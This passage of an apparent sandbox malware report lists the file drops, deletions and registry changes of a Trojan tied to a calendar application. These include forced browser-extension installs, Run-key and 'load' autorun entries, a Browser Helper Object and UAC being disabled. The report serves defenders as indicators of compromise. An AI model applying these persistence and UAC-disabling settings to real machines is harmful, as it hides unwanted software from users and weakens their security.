C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\7zxr.dll (0 bytes)

The process guide.exe:672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\cupdate.dat (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\7zxr.dll (18123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.html (230 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jySougou.sext (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\7zxr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\sec_setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (0 bytes)

Registry activity

The process HC188.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process src2011.tmp:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "74 01 00 00 4B 8D 29 6F B2 6A D2 01"
"RegFilesHash" = "67 1F 22 64 AA 08 EA DB D1 1A E6 49 12 21 45 1A"
"RegFiles0000" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\fixfunction.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\guide.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\istask.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyrili.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jywebHelper.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RIBridage.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView64.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\chromerl.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll"
"SessionHash" = "92 2F 1A C9 3B 82 C2 3F CC 5E 49 15 8E E2 B4 32"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"

The process bFuAq.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\Windows\tAzJsX\bFuAq.exe"

The process 1819.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"wshext.dll,-4511" = "Open &with Command Prompt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process rundll32.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\GameUX\ServiceLocation]
"Games" = "https://games.metaservices.microsoft.com/games/SGamesWebService.asmx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\GameUX]
"OOBGameInstalled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}]
"Description" = "Steam: Dark Messiah Might and Magic :Single Player™"
"ApplicationId" = "{29dfdaf6-2655-4d7d-9dae-112ce811cf33}"
"ConfigGDFBinaryPath" = "C:\Windows\system32\GameUXLegacyGDFs.dll"
"ConfigApplicationPath" = "C:\Windows"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD]
"Blob" = "0F 00 00 00 01 00 00 00 20 00 00 00 52 29 BA 15"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}]
"AppExePath" = "C:\Windows\mm.exe"
"ConfigInstallType" = "3"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"D69B561148F01C77C54578C10926DF5B856976AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process mm.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

To run automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"otqvyruekg.exe" = "C:\Windows\WindowsUpdate\otqvyruekg.exe"

The process regsvr32.exe:2260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\TypeLib]
"(Default)" = "{9F170339-3C7C-488A-AE2F-9B2349D522DE}"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0]
"(Default)" = "NoteWebHeplerLib"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\InprocServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}]
"(Default)" = "IRLExtension"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}]
"(Default)" = "日历模块助手"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\TypeLib]
"(Default)" = "{9F170339-3C7C-488A-AE2F-9B2349D522DE}"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\Version]
"(Default)" = "1.0"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\InprocServer32]
"ThreadingModel" = "Apartment"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{345E24CA-D936-48F3-992A-BF0071EBBCD0}]
"(Default)" = "日历模块助手"
"NoExplorer" = "1"

The process %original file name%.exe:2180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process guide.exe:2532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9B6C2D26-30D5-4711-BD8C-520D8ED70FDF}]
"AppName" = "RIBridage.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{157053CE-EAFA-4823-BFE2-7D5F37A07C24}]
"AppPath" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\"

[HKCU\Software\calendarj\val]
"UID" = "8f8c470902831287fd8ff759df1090d8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"URLInfoAbout" = "www.jyrili.com"
"Publisher" = ""

[HKCU\Software\calendarj\val]
"Count" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9B6C2D26-30D5-4711-BD8C-520D8ED70FDF}]
"AppPath" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\"

[HKCU\Software\2345Explorer\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{157053CE-EAFA-4823-BFE2-7D5F37A07C24}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"DisplayVersion" = "4.0.3.0"
"DisplayName" = "简约日历"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9B6C2D26-30D5-4711-BD8C-520D8ED70FDF}]
"Policy" = "3"

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\uninst.exe"

[HKLM\SOFTWARE\MozillaPlugins\@jyrili.com/yzwebAssist]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jywebHelper.dll"

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\calendarj\val]
"Src" = "2011"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyrili.exe"

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B61A7628-1390-433A-A852-601F4A15A28D}]
"Policy" = "3"

[HKCU\Software\2345Explorer\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B61A7628-1390-433A-A852-601F4A15A28D}]
"AppPath" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{157053CE-EAFA-4823-BFE2-7D5F37A07C24}]
"AppName" = "jyrili.exe"

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B61A7628-1390-433A-A852-601F4A15A28D}]
"AppName" = "update.exe"

The process guide.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = ""

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Explorer\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"
"Version" = "4.0.3"

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

The process otqvyruekg.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

Dropped PE files

MD5 File path
3e733861cf8347465a0c4e0be2d4b521 c:\Program Files\HC188.exe
